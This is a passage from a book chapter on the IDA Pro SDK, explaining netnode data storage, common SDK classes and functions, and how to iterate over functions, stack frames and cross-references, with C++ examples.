must have a valid netnodenumber before you can store data into the netnode.

A netnodenumber may be explicitly assigned, as with n1 via a constructor shown

at Y in the previous example. Alternatively, a netnodenumber may be internally

generated when a netnode is created using the create flag in a constructor

(as with n3 via a constructor shown in Z) or via the create function (as with

n2). Internally assigned netnodenumbers begin with 0xFF000000 and increment

with each newly created netnode.

The IDA Software Development Kit 297

We have thus far neglected netnode n0 in our example. As things currently

stand, n0 has neither a number nor a name. We could create n0 by name using

the create function in a manner similar to n2. Or we could use the alternate

form of create to create an unnamed netnode with a valid, internally generated

netnodenumber, as shown here:

n0.create(); //assign an internally generated netnodenumber to n0

At this point it is possible to store data into n0, though we have no way to

retrieve that data in the future unless we record the assigned netnodenumber

somewhere or assign n0 a name. This demonstrates the fact that netnodes are

easy to access when they are associated with a virtual address (similar to n1 in

our example). For all other netnodes, assigning a name makes it possible to

perform a named lookup for all future references to the netnode (as with n2

and n3 in our example).

Note that for our named netnodes, we have chosen to use names prefixed

with “$ ”, which is in keeping with the practice, recommended in netnode.hpp,

for avoiding conflicts with names IDA uses internally.

Data Storage in Netnodes

Now that you understand how to create a netnode that you can store data into,

let’s return to the discussion of the internal array storage capability of net-

nodes. To store a value into an array within a netnode, we need to specify five

pieces of information: an index value, an index size (8 or 32 bits), a value

to store, the number of bytes the value contains, and an array (one of 256

available for each category of array) in which to store the value. The index

size parameter is specified implicitly by the function that we use to store or

retrieve the data. The remaining values are passed into that function as

parameters. The parameter that selects which of the 256 possible arrays a

value is stored in is usually called a tag, and it is often specified (though it

need not be) using a character. The netnode documentation distinguishes

among a few special types of values termed altvals, supvals, and hashvals. By

default, each of these values is typically associated with a specific array tag: 'A'

for altvals, 'S' for supvals, and 'H' for hashvals. A fourth type of value, called

a charval, is not associated with any specific array tag.

It is important to understand that these value types are associated more

with a specific way of storing data into a netnode than with a specific array

within a netnode. It is possible to store any type of value in any array simply by

specifying an alternate array tag when storing data. In all cases, it is up to you

to remember what type of data you stored into a particular array location so

that you can use retrieval methods appropriate to the type of the stored data.

Altvals provide a simple interface for storing and retrieving integer data

in netnodes. Altvals may be stored into any array within a netnode but default

to the 'A' array. Regardless of which array you wish to store integers into, using

the altval-related functions greatly simplifies matters. The code in Listing 16-2

demonstrates data storage and retrieval using altvals.

298 Chapter 16

netnode n("$ idabook", 0, true); //create the netnode if it doesn't exist

sval_t index = 1000; //sval_t is a 32 bit type, this example uses 32-bit indexes

ulong value = 0x12345678;

n.altset(index, value); //store value into the 'A' array at index

value = n.altval(index); //retrieve value from the 'A' array at index

n.altset(index, value, (char)3); //store into array 3

value = n.altval(index, (char)3); //read from array 3

Listing 16-2: Accessing netnode altvals

In this example, you see a pattern that will be repeated for other types of

netnode values, namely, the use of an XXXset function (in this case, altset) to

store a value into a netnode and an XXXval function (in this case, altval) to

retrieve a value from a netnode. If we want to store integers into arrays using

8-bit index values, we need to use slightly different functions, as shown in the

next example.

netnode n("$ idabook", 0, true);

uchar index = 80; //this example uses 8-bit index values

ulong value = 0x87654321;

n.altset_idx8(index, value, 'A'); //store, no default tags with xxx_idx8 functions

value = n.altval_idx8(index, 'A'); //retrieve value from the 'A' array at index

n.altset_idx8(index, value, (char)3); //store into array 3

value = n.altval_idx8(index, (char)3); //read from array 3

Here you see that the general rule of thumb for the use of 8-bit index

values is to use a function with an _idx8 suffix. Also note that none of the

_idx8 functions provide default values for the array tag parameter.

Supvals represent the most versatile means of storing and retrieving

data in netnodes. Supvals represent data of arbitrary size, from 1 byte to a

maximum of 1,024 bytes. When using 32-bit index values, the default array

for storing and retrieving supvals is the 'S' array. Again, however, supvals can

be stored into any of the 256 available arrays by specifying an appropriate

array tag value. Strings are a common form of arbitrary length data and as

such are afforded special handling in supval manipulation functions. The

code in Listing 16-3 provides examples of storing supvals into a netnode.

netnode n("$ idabook", 0, true); //create the netnode if it doesn't exist

char *string_data = "example supval string data";

char binary_data[] = {0xfe, 0xdc, 0x4e, 0xc7, 0x90, 0x00, 0x13, 0x8a,

0x33, 0x19, 0x21, 0xe5, 0xaa, 0x3d, 0xa1, 0x95};

//store binary_data into the 'S' array at index 1000, we must supply a

//pointer to data and the size of the data

n.supset(1000, binary_data, sizeof(binary_data));

//store string_data into the 'S' array at index 1001. If no size is supplied,

//or size is zero, the data size is computed as: strlen(data) + 1

n.supset(1001, string_data);

The IDA Software Development Kit 299

//store into an array other than 'S' (200 in this case) at index 500

n.supset(500, binary_data, sizeof(binary_data), (char)200);

Listing 16-3: Storing netnode supvals

The supset function requires an array index, a pointer to some data, the

length of the data (in bytes), and an array tag that defaults to 'S' if omitted.

If the length parameter is omitted, it defaults to zero. When the length is

specified as zero, supset assumes that the data being stored is a string, com-

putes the length of the data as strlen(data) + 1, and stores a null termination

character along with the string data.

Retrieving data from a supval takes a little care, as you may not know the

amount of data contained within the supval before you attempt to retrieve it.

When you retrieve data from a supval, bytes are copied out of the netnode

into a user-supplied output buffer. How do you ensure that your output

buffer is of sufficient size to receive the supval data? The first method is to

retrieve all supval data into a buffer that is at least 1,024 bytes. The second

method is to preset the size of your output buffers by querying the size of the

supval. Two functions are available for retrieving supvals. The supval function

is used to retrieve arbitrary data, while the supstr function is specialized for

retrieving string data. Each of these functions expects a pointer to your output

buffer along with the size of the buffer. The return value for supval is the

number of bytes copied into the output buffer, while the return value for

supstr is the length of the string copied to the output buffer not including

the null terminator, even though the null terminator is copied to the buffer.

Each of these functions recognizes the special case in which a NULL pointer

is supplied in place of an output buffer pointer. In such cases, supval and

supstr return the number of bytes of storage (including any null terminator)

required to hold the supval data. Listing 16-4 demonstrates retrieval of supval

data using the supval and supstr functions.

//determine size of element 1000 in 'S' array. The NULL pointer indicates

//that we are not supplying an output buffer

int len = n.supval(1000, NULL, 0);

char *outbuf = new char[len]; //allocate a buffer of sufficient size

n.supval(1000, outbuf, len); //extract data from the supval

//determine size of element 1001 in 'S' array. The NULL pointer indicates

//that we are not supplying an output buffer.

len = n.supstr(1001, NULL, 0);

char *outstr = new char[len]; //allocate a buffer of sufficient size

n.supval(1001, outstr, len); //extract data from the supval

//retrieve a supval from array 200, index 500

char buf[1024];

len = n.supval(500, buf, sizeof(buf), (char)200);

Listing 16-4: Retrieving netnode supvals

300 Chapter 16

Using supvals, it is possible to access any data stored in any array within a

netnode. For example, supval functions can be used to store and retrieve altval

data by limiting the supset and supval operations to the size of an altval. Read-

ing through netnode.hpp, you will see that this is in fact the case by observing

the inlined implementation of the altset function, as shown here:

bool altset(sval_t alt, nodeidx_t value, char tag=atag) {

return supset(alt, &value, sizeof(value), tag);

}

Hashvals offer yet another interface to netnodes. Rather than being

associated with integer indexes, hashvals are associated with key strings.

Overloaded versions of the hashset function make it easy to associate integer

data or array data with a hash key, while the hashval, hashstr, and hashval_long

functions allow retrieval of hashvals when provided with the appropriate hash

key. Tag values associated with the hashXXX functions actually choose one of

256 hash tables, with the default table being 'H'. Alternate tables are selected

by specifying a tag other than 'H'.

The last interface to netnodes that we will mention is the charval interface.

The charval and charset functions offer a simple means to store single-byte

data into a netnode array. There is no default array associated with charval

storage and retrieval, so you must specify an array tag for every charval opera-

tion. Charvals are stored into the same arrays as altvals and supvals, and the

charval functions are simply wrappers around 1-byte supvals.

Another capability provided by the netnode class is the ability to iterate

over the contents of a netnode array (or hash table). Iteration is performed

using XXX1st, XXXnxt, XXXlast, and XXXprev functions that are available for

altvals, supvals, hashvals, and charvals. The example in Listing 16-5 illustrates

iteration across the default altvals array ('A').

Iteration over supvals, charvals, and hashvals is performed in a very similar

manner; however, you will find that the syntax varies depending on the type

of values being accessed. For example, iteration over hashvals returns hashkeys

rather than array indexes, which must then be used to retrieve hashvals.

netnode n("$ idabook", 0, true);

//Iterate altvals first to last

for (nodeidx_t idx = n.alt1st(); idx != BADNODE; idx = n.altnxt(idx)) {

ulong val = n.altval(idx);

msg("Found altval['A'][%d] = %d\n", idx, val);

}

//Iterate altvals last to first

for (nodeidx_t idx = n.altlast(); idx != BADNODE; idx = n.altprev(idx)) {

ulong val = n.altval(idx);

msg("Found altval['A'][%d] = %d\n", idx, val);

}

Listing 16-5: Enumerating netnode altvals

The IDA Software Development Kit 301

Deleting Netnodes and Netnode Data

The netnode class also provides functions for deleting individual array elements,

the entire contents of an array, or the entire contents of a netnode. Removing

an entire netnode is fairly straightforward.

netnode n("$ idabook", 0, true);

n.kill(); //entire contents of n are deleted

When deleting individual array elements, or entire array contents, you

must take care to choose the proper deletion function because the names of

the functions are very similar and choosing the wrong form may result in

significant loss of data. Commented examples demonstrating deletion of

altvals follow:

netnode n("$ idabook", 0, true);

Y n.altdel(100); //delete item 100 from the default altval array ('A')

n.altdel(100, (char)3); //delete item 100 from altval array 3

X n.altdel(); //delete the entire contents of the default altval array

n.altdel_all('A'); //alternative to delete default altval array contents

n.altdel_all((char)3); //delete the entire contents of altval array 3;

Note the similarity in the syntax to delete the entire contents of the default

altval array X and the syntax to delete a single element from the default altval

array Y. If for some reason you fail to specify an index when you want to delete

a single element, you may end up deleting an entire array. Similar functions

exist to delete supval, charval, and hashval data.

NETNODES AND IDC GLOBAL ARRAYS

You may recall from Chapter 15 that the IDC scripting language provides persistent

global arrays. Netnodes provide the backing storage for IDC global arrays. When

you supply a name to the IDC CreateArray function, the string $ idc_array is pre-

pended to the name that you supply to form a netnode name. The netnodenumber

of the newly created netnode is returned to you as the IDC array identifier. The

IDC SetArrayLong function stores an integer into the altvals ('A') array, while the

SetArrayString function stores a string into the supvals ('S') array. When you

retrieve a value from an IDC array using the GetArrayElement function, the tags that

you supply (AR_LONG or AR_STR) represent the tags to the altval and supval arrays used

to store the corresponding integer or strings data.

Appendix B offers additional insight into the use of netnodes within the imple-

mentations of IDC functions and exposes how netnodes are used to store various types

of information (such as comments) within a database.

302 Chapter 16

Useful SDK Datatypes

IDA’s API defines a number of C++ classes designed to model components

typically found in executable files. The SDK contains classes to describe

functions, program sections, data structures, individual assembly language

instructions, and individual operands within each instruction. Additional

classes are defined to implement the tools that IDA uses to manage the

disassembly process. Classes falling into this latter category define general

database characteristics, loader module characteristics, processor module

characteristics, and plug-in module characteristics, and they define the

assembly syntax to be used for each disassembled instruction.

Some of the more common general-purpose classes are described here.

We defer discussion of classes that are more specific to plug-ins, loaders, and

processor modules until the appropriate chapters covering those topics.

Our goal here is to introduce classes, their purposes, and some important

data members of each class. Useful functions for manipulating each class are

described in “Commonly Used SDK Functions” on page 304.

area_t (area.hpp)

This struct describes a range of addresses and is the base class for several

other classes. The struct contains two data members, startEA (inclusive)

and endEA (exclusive), that define the boundaries of the address range.

Member functions are defined that compute the size of the address

range and that can perform comparisons between two areas.

func_t (funcs.hpp)

This class inherits from area_t. Additional data fields are added to the

class to record binary attributes of the function, such as whether the

function uses a frame pointer or not, and attributes describing the

function’s local variables and arguments. For optimization purposes,

some compilers may split functions into several noncontiguous regions

within a binary. IDA terms these regions chunks or tails. The func_t class

is also used to describe tail chunks.

segment_t (segment.hpp)

The segment_t class is another subclass of area_t. Additional data fields

describe the name of the segment, the permissions in effect in the

segment (readable, writeable, executable), the type of the segment

(code, data, etc.), and the number of bits used in a segment address

(16, 32, or 64).

idc_value_t (expr.hpp)

This class describes the contents of an IDC value, which may contain at

any time a string, an integer, or a floating-point value. The type is utilized

extensively when interacting with IDC functions from within a compiled

module.

The IDA Software Development Kit 303

idainfo (ida.hpp)

This struct is populated with characteristics describing the open data-

base. A single global variable named inf, of type idainfo, is declared in

ida.hpp. Fields within this struct describe the name of the processor

module that is in use, the input file type (such as f_PE or f_MACHO via the

filetype_t enum), the program entry point (beginEA), the minimum

address within the binary (minEA), the maximum address in the binary

(maxEA), the endianness of the current processor (mf), and a number of

configuration settings parsed from ida.cfg.

struc_t (struct.hpp)

This class describes the layout of structured data within a disassembly. It

is used to describe structures within the Structures window as well as to

describe the composition of function stack frames. A struc_t contains

flags describing attributes of the structure (such as whether it is a struc-

ture or union or whether the structure is collapsed or expanded in the

IDA display window), and it also contains an array of structure members.

member_t (struct.hpp)

This class describes a single member of a structured datatype. Included

data fields describe the byte offset at which the member begins and ends

within its parent structure.

op_t (ua.hpp)

This class describes a single operand within a disassembled instruction.

The class contains a zero-based field to store the number of the operand

(n), an operand type field (type), and a number of other fields whose

meaning varies depending on the operand type. The type field is set to

one of the optype_t constants defined in ua.hpp and describes the operand

type or addressing mode used for the operand.

insn_t (ua.hpp)

This class contains information describing a single disassembled instruc-

tion. Fields within the class describe the instruction’s address within the

disassembly (ea), the instruction’s type (itype), the instruction’s length

in bytes (size), and an array of six possible operand values (Operands) of

type op_t (IDA limits each instruction to a maximum of six operands).

The itype field is set by the processor module. For standard IDA processor

modules, the itype field is set to one of the enumerated constants defined

in allins.hpp. When a third-party processor module is used, the list of

potential itype values must be obtained from the module developer.

Note that the itype field generally bears no relationship whatsoever to

the binary opcode for the instruction.

The preceding list is by no means a definitive guide to all of the datatypes

used within the SDK. This list is intended merely as an introduction to some

of the more commonly used classes and some of the more commonly accessed

fields within those classes.

304 Chapter 16

Commonly Used SDK Functions

While the SDK is programmed using C++ and defines a number of C++ classes,

in many cases the SDK favors traditional C-style nonmember functions for

manipulation of objects within a database. For most API datatypes, it is more

common to find nonmember functions that require a pointer to an object

than it is to find a member function to manipulate the object in the manner

you desire.

In the summaries that follow, we cover API functions that provide func-

tionality similar to many of the IDC functions introduced in Chapter 15. It is

unfortunate that functions that perform identical tasks are named one thing

in IDC and something different within the API.

Basic Database Access

The following functions, declared in bytes.hpp, provide access to individual

bytes, words, and dwords within a database.

uchar get_byte(ea_t addr) Reads current byte value from virtual

address addr.

ushort get_word(ea_t addr) Reads current word value from virtual

address addr.

ulong get_long(ea_t addr) Reads current double word value from virtual

address addr.

get_many_bytes(ea_t addr, void *buffer, ssize_t len) Copies len bytes

from the addr into the supplied buffer.

patch_byte(ea_t addr, ulong val) Sets a byte value at virtual address addr.

patch_word(long addr, ulonglong val) Sets a word value at virtual

address addr.

patch_long(long addr, ulonglong val) Sets a double word value at virtual

address addr.

patch_many_bytes(ea_t addr, const void *buffer, size_t len) Patches the

database beginning at addr with len bytes from the user-supplied buffer.

ulong get_original_byte(ea_t addr) Reads the original byte value (prior

to patching) from virtual address addr.

ulonglong get_original_word(ea_t addr) Reads the original word value

from virtual address addr.

ulonglong get_original_long(ea_t addr) Reads the original double word

value from virtual address addr.

bool isLoaded(ea_t addr) Returns true if addr contains valid data, false

otherwise.

Additional functions exist for accessing alternative data sizes. Note that

the get_original_XXX functions get the very first original value, which is not

necessarily the value at an address prior to a patch. Consider the case when a

byte value is patched twice; over time this byte has held three different values.

The IDA Software Development Kit 305

After the second patch, both the current value and the original value are

accessible, but there is no way to obtain the second value (which was set with

the first patch).

User Interface Functions

Interaction with the IDA user interface is handled by a single dispatcher func-

tion named callui. Requests for various user interface services are made by

passing a user interface request (one of the enumerated ui_notification_t

constants) to callui along with any additional parameters required by

the request. Parameters required for each request type are specified in

kernwin.hpp. Fortunately, a number of convenience functions that hide

many of the details of using callui directly are also defined in kernwin.hpp.

Several common convenience functions are described here:

msg(char *format, ...) Prints a formatted message to the message

window. This function is analogous to C’s printf function and accepts

aprintf-style format string.

warning(char *format, ...) Displays a formatted message in a dialog.

char *askstr(int hist, char *default, char *format, ...) Displays an

input dialog asking the user to enter a string value. The hist parameter

dictates how the drop-down history list in the dialog should be populated

and should be set to one of the HIST_xxx constants defined in kernwin.hpp.

The format string and any additional parameters are use to form a

prompt string.

char *askfile_c(int dosave, char *default, char *prompt, ...) Displays a

file save (dosave = 1) or file open (dosave = 0) dialog, initially displaying the

directory and file mask specified by default (such as C:\\windows\\*.exe).

Returns the name of the selected file or NULL if the dialog was canceled.

askyn_c(int default, char *prompt, ...) Prompts the user with a yes or

no question, highlighting a default answer (1 = yes, 0 = no, −1 = cancel).

Returns an integer representing the selected answer.

AskUsingForm_c(const char *form, ...) The form parameter is an ASCII

string specification of a dialog and its associated input elements. This

function may be used to build customized user interface elements when

none of the SDK’s other convenience functions meet your needs. The

format of the form string is detailed in kernwin.hpp.

get_screen_ea() Returns the virtual address of the current cursor

location.

jumpto(ea_t addr) Jumps the disassembly window to the specified

address.

Many more user interface capabilities are available using the API than are

available with IDC scripting, including the ability to create customized single-

and multicolumn list selection dialogs. Users interested in these capabilities

should consult kernwin.hpp and the choose and choose2 functions in particular.

306 Chapter 16

Manipulating Database Names

The following functions are available for working with named locations within

a database:

get_name(ea_t from, ea_t addr, char *namebuf, size_t maxsize)

Returns the name associated with addr. Returns the empty string if the

location has no name. This function provides access to local names when

from is any address in the function that contains addr. The name is copied

into the provided output buffer.

set_name(ea_t addr, char *name, int flags) Assigns the given name to the

given address. The name is created with attributes specified in the flags

bitmask. Possible flag values are described in name.hpp.

get_name_ea(ea_t funcaddr, char *localname) Searches for the given local

name within the function containing funcaddr. Returns the address of

the name or BADADDR (−1) if no such name exists in the given function.

Function Manipulation

The API functions for accessing information about disassembled functions

are declared in funcs.hpp. Functions for accessing stack frame information are

declared in frame.hpp. Some of the more commonly used functions are

described here:

func_t *get_func(ea_t addr) Returns a pointer to a func_t object that

describes the function containing the indicated address.

size_t get_func_qty() Returns the number of functions present in the

database.

func_t *getn_func(size_t n) Returns a pointer to a func_t object that

represents the nth function in the database where n is between zero

(inclusive) and get_func_qty() (exclusive).

func_t *get_next_func(ea_t addr) Returns a pointer to a func_t object

that describes the next function following the specified address.

get_func_name(ea_t addr, char *name, size_t namesize) Copies the name

of the function containing the indicated address into the supplied name

buffer.

struc_t *get_frame(ea_t addr) Returns a pointer to a struc_t object that

describes the stack frame for the function that contains the indicated

address.

Structure Manipulation

The struc_t class is used to access function stack frames as well as structured

datatypes defined within type libraries. Some of the basic functions for inter-

acting with structures and their associated members are described here.

Many of these functions make use of a type ID (tid_t) datatype. The API

The IDA Software Development Kit 307

includes functions for mapping a struc_t to an associated tid_t and vice

versa. Note that both the struc_t and member_t classes contain a tid_t data

member, so obtaining type ID information is simple if you already have a

pointer to a valid struc_t or member_t object.

tid_t get_struc_id(char *name) Looks up the type ID of a structure given

its name.

struc_t *get_struc(tid_t id) Obtains a pointer to a struc_t representing

the structure specified by the given type ID.

asize_t get_struc_size(struc_t *s) Returns the size of the given

structure in bytes.

member_t *get_member(struc_t *s, asize_t offset) Returns a pointer to a

member_t object that describes the structure member that resides at the

specified offset into the given structure.

member_t *get_member_by_name(struc_t *s, char *name) Returns a pointer

to a member_t object that describes the structure member identified by the

given name.

tid_t add_struc(uval_t index, char *name, bool is_union=false)

Appends a new structure with the given name into the standard structures

list. The structure is also added to the Structures window at the given

index. If index is BADADDR, the structure is added as the last structure in the

Structures window.

add_struc_member(struc_t *s, char *name, ea_t offset, flags_t flags,

typeinfo_t *info, asize_t size) Adds a new member with the given name

to the given structure. The member is either added at the indicated

offset within the structure or appended to the end of the structure

if offset is BADADDR. The flags parameter describes the datatype of the

new member. Valid flags are defined using the FF_XXX constants described

in bytes.hpp. The info parameter provides additional information for com-

plex datatypes; it may be set to NULL for primitive datatypes. The typeinfo_t

datatype is defined in nalt.hpp. The size parameter specifies the number

of bytes occupied by the new member.

Segment Manipulation

The segment_t class stores information related to the different segments

within a database (such as .text and .data) as listed in the ViewOpen

SubviewsSegments window. Recall that what IDA terms segments are often

referred to as sections by various executable file formats such as PE and ELF.

The following functions provide basic access to segment_t objects. Additional

functions dealing with the segment_t class are declared in segment.hpp.

segment_t *getseg(ea_t addr) Returns a pointer to the segment_t object

that contains the given address.

segment_t *ida_export get_segm_by_name(char *name) Returns a pointer to

the segment_t object with the given name.

308 Chapter 16

add_segm(ea_t para, ea_t start, ea_t end, char *name, char *sclass)

Creates a new segment in the current database. The segment’s bound-

aries are specified with the start (inclusive) and end (exclusive) address

parameters, while the segment’s name is specified by the name parameter.

The segment’s class loosely describes the type of segment being created.

Predefined classes include CODE and DATA. A complete list of predefined

classes may be found in segment.hpp. The para parameter describes the

base address of the section when segmented addresses (seg:offset) are

being used, in which case start and end are interpreted as offsets rather

than as virtual addresses. When segmented addresses are not being used,

or all segments are based at 0, this parameter should be set to 0.

add_segm_ex(segment_t *s, char *name, char *sclass, int flags)

Alternate method for creating new segments. The fields of s should be

set to reflect the address range of the segment. The segment is named

and typed according to the name and sclass parameters. The flags param-

eter should be set to one of the ADDSEG_XXX values defined in segment.hpp.

int get_segm_qty() Returns the number of sections present within the

database.

segment_t *getnseg(int n) Returns a pointer to a segment_t object

populated with information about the nth program section in the

database.

int set_segm_name(segment_t *s, char *name, ...) Changes the name of

the given segment. The name is formed by treating name as a format string

and incorporating any additional parameters as required by the format

string.

get_segm_name(ea_t addr, char *name, size_t namesize) Copies the name

of the segment containing the given address into the user-supplied name

buffer. Note the name may be filtered to replace characters that IDA con-

siders invalid (characters not specified as NameChars in ida.cfg) with a

dummy character (typically an underscore as specified by SubstChar in

ida.cfg).

get_segm_name(segment_t *s, char *name, size_t namesize) Copies the

potentially filtered name of the given segment into the user-supplied

name buffer.

get_true_segm_name(segment_t *s, char *name, size_t namesize) Copies the

exact name of the given segment into the user-supplied name buffer with-

out filtering any characters.

One of the add_segm functions must be used to actually create a

segment. Simply declaring and initializing a segment_t object does not

actually create a segment within the database. This is true with all of the

wrapper classes such as func_t and struc_t. These classes merely provide

a convenient means to access attributes of an underlying database entity.

The appropriate functions to create, modify, or delete actual database

objects must be utilized in order to make persistent changes to the

database.

The IDA Software Development Kit 309

Code Cross-References

A number of functions and enumerated constants are defined in xref.hpp for

use with code cross-references. Some of these are described here:

get_first_cref_from(ea_t from) Returns the first location to which the

given address transfers control. Returns BADADDR (−1) if the given

address refers to no other addresses.

get_next_cref_from(ea_t from, ea_t current) Returns the next location

to which the given address (from) transfers control, given that current

has already been returned by a previous call to get_first_cref_from or

get_next_cref_from. Returns BADADDR if no more cross-references exist.

get_first_cref_to(ea_t to) Returns the first location that transfers

control to the given address. Returns BADADDR (−1) if there are no

references to the given address.

get_next_cref_to(ea_t to, ea_t current) Returns the next location that

transfers control to the given address (to), given that current has already

been returned by a previous call to get_first_cref_to or get_next_cref_to.

Returns BADADDR if no more cross-references to the given location exist.

Data Cross-References

The functions for accessing data cross-reference information (also declared

in xref.hpp) are very similar to the functions used to access code cross-reference

information. These functions are described here:

get_first_dref_from(ea_t from) Returns the first location to which the

given address refers to a data value. Returns BADADDR (−1) if the given

address refers to no other addresses.

get_next_dref_from(ea_t from, ea_t current) Returns the next location

to which the given address (from) refers a data value, given that current

has already been returned by a previous call to get_first_dref_from or

get_next_dref_from. Returns BADADDR if no more cross-references exist.

get_first_dref_to(ea_t to) Returns the first location that refers to the

given address as data. Returns BADADDR (−1) if there are no references

to the given address.

get_next_dref_to(ea_t to, ea_t current) Returns the next location that

refers to the given address (to) as data, given that current has already

been returned by a previous call to get_first_dref_to or get_next_dref_to.

Returns BADADDR if no more cross-references to the given location exist.

The SDK contains no equivalent to IDC’s XrefType function. A variable

named lastXR is declared in xref.hpp; however, it is not exported. If you need

to determine the exact type of a cross-reference, you must iterate cross-

references using an xrefblk_t structure. The xrefblk_t is described in

“Enumerating Cross-References” on page 311.

310 Chapter 16

Iteration Techniques Using the IDA API

Using the IDA API, there are often several different ways to iterate over

various database objects. In the following examples we demonstrate some

common iteration techniques:

Enumerating Functions

The first technique for iterating through the functions within a database

mimics the manner in which we performed the same task using IDC:

for (func_t *f = get_next_func(0); f != NULL; f = get_next_func(f->startEA)) {

char fname[1024];

get_func_name(f->startEA, fname, sizeof(fname));

msg("%08x: %s\n", f->startEA, fname);

}

Alternatively, we can simply iterate through functions by index numbers,

as shown in the next example:

for (int idx = 0; idx < get_func_qty(); idx++) {

char fname[1024];

func_t *f = getn_func(idx);

get_func_name(f->startEA, fname, sizeof(fname));

msg("%08x: %s\n", f->startEA, fname);

}

Finally, we can work at a somewhat lower level and make use of a data

structure called an areacb_t, also known as an area control block, defined in

area.hpp. Area control blocks are used to maintain lists of related area_t

objects. A global areacb_t named funcs is exported (in funcs.hpp) as part of

the IDA API. Using the areacb_t class, the previous example can be rewritten

as follows:

Xint a = funcs.get_next_area(0);

while (a != -1) {

char fname[1024];

Zfunc_t *f = (func_t*)funcs.getn_area(a); // getn_area returns an area_t

get_func_name(f->startEA, fname, sizeof(fname));

msg("%08x: %s\n", f->startEA, fname);

Ya = funcs.get_next_area(f->startEA);

}

In this example, the get_next_area member function X and Y is used

repeatedly to obtain the index values for each area in the funcs control block.

A pointer to each related func_t area is obtained by supplying each index

value to the getn_area member function Z. Several global areacb_t variables

are declared within the SDK, including the segs global, which is an area

control block containing segment_t pointers for each section in the binary.

The IDA Software Development Kit 311

Enumerating Structure Members

Within the SDK, stack frames are modeled using the capabilities of the struc_t

class. The example in Listing 16-6 utilizes structure member iteration as a

means of printing the contents of a stack frame.

func_t *func = get_func(get_screen_ea()); //get function at cursor location

msg("Local variable size is %d\n", func->frsize);

msg("Saved regs size is %d\n", func->frregs);

struc_t *frame = get_frame(func); //get pointer to stack frame

if (frame) {

size_t ret_addr = func->frsize + func->frregs; //offset to return address

for (size_t m = 0; m < frame->memqty; m++) { //loop through members

char fname[1024];

get_member_name(frame->members[m].id, fname, sizeof(fname));

if (frame->members[m].soff < func->frsize) {

msg("Local variable ");

}

else if (frame->members[m].soff > ret_addr) {

msg("Parameter ");

}

msg("%s is at frame offset %x\n", fname, frame->members[m].soff);

if (frame->members[m].soff == ret_addr) {

msg("%s is the saved return address\n", fname);

}

Listing 16-6: Enumerating stack frame members

This example summarizes a function’s stack frame using information

from the function’s func_t object and the associated struc_t representing the

function’s stack frame. The frsize and and frregs fields specify the size of the

local variable portion of the stack frame and the number of bytes dedicated

to saved registers, respectively. The saved return address can be found within

the frame following the local variables and the saved registers. Within the

frame itself, the memqty field specifies the number of defined members con-

tained in the frame structure, which also corresponds to the size of the members

array. A loop is used to retrieve the name of each member and determine

whether the member is a local variable or an argument based on its starting

offset (soff) within the frame structure.

Enumerating Cross-References

In Chapter 15 we saw that it is possible to enumerate cross-references from

IDC scripts. The same capabilities exist within the SDK, though in a some-

what different form. As an example, let’s revisit the idea of listing all calls of

a particular function (see Listing 15-4 on page 274). The following function

almost works.

void list_callers(char *bad_func) {

char name_buf[MAXNAMELEN];

312 Chapter 16

ea_t func = get_name_ea(BADADDR, bad_func);

if (func == BADADDR) {

warning("Sorry, %s not found in database", bad_func);

}

else {

for (ea_t addr = get_first_cref_to(func); addr != BADADDR;

addr = get_next_cref_to(func, addr)) {

char *name = get_func_name(addr, name_buf, sizeof(name_buf));

if (name) {

msg("%s is called from 0x%x in %s\n", bad_func, addr, name);

}

else {

msg("%s is called from 0x%x\n", bad_func, addr);

}

The reason this function almost works is that there is no way to deter-

mine the type of cross-reference returned for each iteration of the loop

(recall that there is no SDK equivalent for IDC’s XrefType). In this case we

should verify that each cross-reference to the given function is in fact a call

type (fl_CN or fl_CF) cross-reference.

When you need to determine the type of a cross-reference within the

SDK, you must use an alternative form of cross-reference iteration facilitated

by the xrefblk_t structure, which is described in xref.hpp. The basic layout

of an xrefblk_t is shown in the following listing. (For full details, please see

xref.hpp.)

struct xrefblk_t {

ea_t from; // the referencing address - filled by first_to(),next_to()

ea_t to; // the referenced address - filled by first_from(), next_from()

uchar iscode; // 1-is code reference; 0-is data reference

uchar type; // type of the last returned reference

uchar user; // 1-is user defined xref, 0-defined by ida

//fill the "to" field with the first address to which "from" refers.

Xbool first_from(ea_t from, int flags);

//fill the "to" field with the next address to which "from" refers.

//This function assumes a previous call to first_from.

Zbool next_from(void);

//fill the "from" field with the first address that refers to "to".

Ybool first_to(ea_t to,int flags);

//fill the "from" field with the next address that refers to "to".

//This function assumes a previous call to first_to.

[bool next_to(void);

};

The IDA Software Development Kit 313

The member functions of xrefblk_t are used to initialize the structure X

and Y and perform the iteration Z and [, while the data members are used

to access information about the last cross-reference that was retrieved. The

flags value required by the first_from and first_to functions dictates which

type of cross-references should be returned. Legal values for the flags

parameter include the following (from xref.hpp):

#define XREF_ALL 0x00 // return all references

#define XREF_FAR 0x01 // don't return ordinary flow xrefs

#define XREF_DATA 0x02 // return data references only

Note that no flag value restricts the returned references to code only.

If you are interested in code cross-references, you must either compare the

xrefblk_t type field to specific cross-reference types (such as fl_JN) or test the

iscode field to determine if the last returned cross-reference was a code cross-

reference.

The following modified version of the list_callers function demonstrates

the use of an xrefblk_t iteration structure.

void list_callers(char *bad_func) {

char name_buf[MAXNAMELEN];

ea_t func = get_name_ea(BADADDR, bad_func);

if (func == BADADDR) {

warning("Sorry, %s not found in database", bad_func);

}

else {

xrefblk_t xr;

for (bool ok = xr.first_to(func, XREF_ALL); ok; ok = xr.next_to()) {

X if (xr.type != fl_CN && xr.type != fl_CF) continue;

char *name = get_func_name(xr.from, name_buf, sizeof(name_buf));

if (name) {

msg("%s is called from 0x%x in %s\n", bad_func, xr.from, name);

}

else {

msg("%s is called from 0x%x\n", bad_func, xr.from);

}

Through the use of an xrefblk_t, we now have the opportunity to

examine X the type of each cross-reference returned by the iterator and

decide whether it is interesting to us or not. In this example we simply ignore

any cross-reference that is not related to a function call. We did not use the

iscode member of xrefblk_t because iscode is true for jump and ordinary flow

cross-references in addition to call cross-references. Thus, iscode alone does

not guarantee that the current cross-reference is related to a function call.

314 Chapter 16

Summary

The functions and data structures described in this chapter only scratch the

surface of IDA’s API. For each of the functional categories described, many

more API functions exist that perform more specialized tasks and that provide

much finer control over various database elements than can be implemented

using IDC. In the following chapters we will cover the details of building plug-

in modules, loader modules, and processor modules, and we will continue to

expand our presentation of the capabilities of the SDK.

JMP

EBP

SUB

THE IDA PLUG-IN

ARCHITECTURE

Over the course of the next few chapters,

we will cover the types of modules that can

be constructed using the IDA SDK. We will also

discuss new features (since IDA 5.7) that allow for the

development of these same types of modules using one

of IDA’s scripting languages. Whether you ever intend

